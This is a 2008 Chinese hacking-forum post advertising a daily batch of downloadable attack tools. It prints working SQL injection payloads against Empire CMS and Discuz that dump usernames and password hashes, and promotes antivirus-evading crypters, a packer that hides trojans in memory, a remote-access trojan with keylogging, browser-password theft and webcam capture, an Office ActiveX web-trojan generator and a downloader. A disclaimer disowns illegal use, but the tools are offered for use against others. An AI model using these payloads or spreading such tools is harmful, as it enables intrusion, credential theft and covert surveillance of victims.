|
|
楼主 |
发表于 2008-8-16 19:46:52
|
显示全部楼层
|阅读模式
来自 山东省青岛市莱西市
友情提示:
1. 此更新合集由软件兵器库整理,图片上传到免费空间,可能观看速度有些慢,请耐心等待下或者刷新下!
2. 所有软件均来自网络,我们保证您下载的软件无任何捆绑,至于有无后门请自行检测!
3. 软件上传于免费网盘, 点击进入下载地址后即可下载. 为防止网盘下载失效,从即日起增加论坛地址,如果网盘地址失效,可以访问论坛地址进行下载!
4. 对于使用工具造成的一切违法行为一律与本站无关!
5. 欢迎访问软件兵器库 专注收集更新国内外最新黑软! 地址: www.286hacktools.cn
6. 关于无法打开某些VB的免杀软件.捆绑器等等 请看: http://www.286hacktools.cn/read.php?tid=755
7. 宣传论坛,免费观看黑鹰全套vip教程: http://www.286hacktools.cn/read.php?tid=737
今日更新列表:
1. [入侵辅助] 帝国ECMS 0Day
2. [入侵辅助] Discuz space.php注射工具 av0day GUI版
3. [免杀软件] KGB-Crypter
4. [免杀软件] Stop WaR Crypter
5. [免杀软件] AVBox 1.0 Beta
6. [远程控制] PaiNRAT 汉化版
7. [木马后门] Joewm Microsoft Office Snapshot Viewer ActiveX Exploit奥运版
8. [木马后门] 黑客防线VIP专用BAT下载者
1. 帝国ECMS 0Day
软件大小: 817 kb
软件说明:
看到每次运行软件都要弹主页,麻烦.给去了~~
帝国ECMS /e/member/list/index.php文件:
if($sear)
{
$keyboard=RepPostVar2($_GET['keyboard']);
if($keyboard)
{
$add.=$where.$user_username.\" like '%$keyboard%'\";
}
$search.=\"&sear=1&keyboard=$keyboard\";
}
判断sear参数是否存在,然后直接去keyboard的参数,然后再判断keyboard值是否为空,如果不为
空就直接把keyboard带入查询产生注射漏洞.
利用方法:
/e/member/list/index.php?sear=1&totalnum=1&keyboard=%D9'+union+select+1,1,1,concat(char
(123),userid,char(95),username,char(95),password,char(125))+from+phome_enewsuser/*
程序截图:
论坛下载连接: http://www.286hacktools.cn/read.php?tid=2280
点击进入下载页面
2. Discuz space.php注射工具 av0day GUI版
软件大小: 829 KB
软件说明:
看到每次运行软件都要弹主页,麻烦.给去了~~
$member = $db->fetch_first(\"SELECT m.*, mf.*, u.grouptitle, u.type, u.creditshigher, u.creditslower,
u.readaccess,
u.color AS groupcolor, u.stars AS groupstars, u.allownickname, u.allowuseblog, r.ranktitle,
r.color AS rankcolor, r.stars AS rankstars $oltimeadd1
FROM {$tablepre}members m
LEFT JOIN {$tablepre}memberfields mf ON mf.uid=m.uid
LEFT JOIN {$tablepre}usergroups u ON u.groupid=m.groupid
LEFT JOIN {$tablepre}ranks r ON m.posts>=r.postshigher
$oltimeadd2
WHERE \".($uid ? \"m.uid='$uid'\" : \"m.username='$username'\").\"ORDER BY r.postshigher DESC LIMIT
1\");
discuz的空间功能 space.php
查询中包含username值查询,经过编码构造可产生注射漏洞 UTF-8 不存在此漏洞
最近常出现类似的编码注射漏洞,这是因为例如gbk这种编码下php服务器不能很好的过滤'号
所
以造成漏洞的发生,而使用UTF-8编码的程序不会出现这个问题,不会产生编码转换时的错误,
引
号得到了完好过滤,杜绝了编码注射漏洞的发生.
漏洞利用方法:
http://地址/space.php?username=%cf'%20UNION%20Select%
201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35
,
36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,
6
8,69,70,71,72,73,74,75,76,77,78,79,80,81,database(),83/*
程序截图:
论坛下载连接: http://www.286hacktools.cn/read.php?tid=2279
点击进入下载页面
3. KGB-Crypter
软件大小: 68 KB
软件说明:
a-squarednot find malware!
AhnLab V3not find malwaTR/Crypt.FKM.Gen
Arcavirnot find malware!
AVAST!not find malware!
AVGnot find malware!
F-Securenot find malware!
Kasperskynot find malware!
KingSoftnot find malware!
McAfeenot find malware!
Microsoftnot find malware!
Pandanot find malware!
nProtectnot find malware!
The Hackernot find malware!
VBA32not find malware!
VirusBusteRnot find malware!
程序截图:
论坛下载连接: http://www.286hacktools.cn/read.php?tid=2218
点击进入下载页面
4. Stop WaR Crypter
软件大小: 340 Kb
软件说明:
国外新出的免杀工具,效果自测~
程序截图:
论坛下载连接: http://www.286hacktools.cn/read.php?tid=2242
点击进入下载页面
5. AVBox 1.0 Beta
软件大小: 432 Kb
软件说明:
用途:
本软件为一款伪壳,用于免杀辅助使用~~呵呵 代码部分采用了Anskya的PolyBox源码 在此特别感谢
软件功能:
1、木马EXE文件随机加密后储存在自身,使用时动态加载到内存运行,不将原EXE文件释放到硬盘,从而避开杀毒的文件、内存查杀
2、支持恢复SSDT功能,辅助木马过主动
3、支持反虚拟机载入功能,用于反虚拟机调试以及反卡巴斯基的启发式查杀
4、加入进程隐藏功能,加壳后的程序运行后无任何进程
5、加入破还原功能,暂时支持还原精灵6.0以及6.0以下版本
6、支持二次加壳功能。即使用本程序处理后可用其他加壳软件再次加壳!
注意事项:
1、本程序不支持灰鸽子系列以及上兴远程控制的免杀
2、被加壳程序必须无壳!
程序截图:
论坛下载连接: http://www.286hacktools.cn/read.php?tid=2247
点击进入下载页面
6. PaiNRAT 汉化版
软件大小: 779 KB
软件说明:
软件汉化:懵兵
发现 文件管理 Bug:无法上传文件
特点 :
----------
- 穿墙 (Dll注入, 该Dll主体不写入磁盘)
- 传输加密
- 尝试启动钩子键盘记录
- 无插件/第三方程序
- 4种启动方法 (Shell, Policies, ActiveX, UserInIt)
- 支持设置最大连接数
- 内置文件捆绑功能
- 多线程文件传输
- 反调试器调试 (Anti VMware, VirtualPC, Anubis Sandbox..etc)
广播功能 :
-----------
- 服务选择
- 搜索
|_搜索文件
|_搜索窗口
- 密码
|_多种密码
|_火狐浏览器密码
- 延迟选项
- 上传键盘记录日记
- HTTP下载
- DOS执行命令
- 下载执行
- USB监控
功能 :
----------
- 管理
|_文件管理 Bug:无法上传文件
|_搜索文件 (多线程)
|_窗口管理
|_注册表管理
|_搜索注册表
|_进程管理 (结束, 暂停, 恢复 和重新启动)
|_模块列表 (可以将DLL全局脱钩)
|_驱动管理 *
|_启动项管理 (注册表和开始中的启动目录)
|_剪切板管理 (文本和文件)
|_服务管理 (支持驱动服务管理)
- 监视
|_屏幕捕捉 (使用PNG压缩图像)
|_摄像头捕捉 (支持多摄像头)
|_键盘日志
|_追踪
|_USB监控 (自动拷贝文件至USB设备)
|_剪切板
- 信息
|_PC信息
|_用户帐户
|_当前连接账户
|_用户会话
|_安装盘序号
|_安装程序.
|_网卡信息
|_活动端口 *
- 密码
|_Misc Passwords (Live Messenger and No-IP DUC)
|_火狐浏览器密码 (支持 Firefox 2 and 3)
|_LSA 加密密码
- 杂项
|_远程执行 (执行HTTP或本地文件)
|_弹窗消息发送
|_命令回显
|_显示设置
|_延迟选项
|_脚本执行
- 网络工具
|_Web 服务器
|_Socks 服务器
|_Web 文件传输 (HTTP下载, FTP上传下载)
|_端口扫描
|_主机重定向
-----------------------------------------
* = 不兼容Vista
服务端大小 : 173 KB (不加壳)
-----------------------------------------
木马说明文件翻译:new4
程序截图:
论坛下载连接: http://www.286hacktools.cn/read.php?tid=2277
点击进入下载页面
7. Joewm Microsoft Office Snapshot Viewer ActiveX Exploit奥运版
软件大小: 737 KB
软件说明:
Microsoft Office Snapshot Viewer ActiveX Exploit 三代码版
这个东西只要装上snpvw.exe就可以实现了,前提是存在漏洞,未补丁的!
前两种网马代码网络上已经公布
而第三种Joewm变异版,却是本工作室内部提供给商业用户的代码!
为庆祝奥运,征得了商业用户的同意,特放出生成器!
程序截图:
论坛下载连接: http://www.286hacktools.cn/read.php?tid=2243
点击进入下载页面
8. 黑客防线VIP专用BAT下载者
软件大小: 569 KB
软件说明:
效果自测
程序截图:
论坛下载连接: http://www.286hacktools.cn/read.php?tid=2244
点击进入下载页面
|
|
发表于 2008-8-16 19:49:41
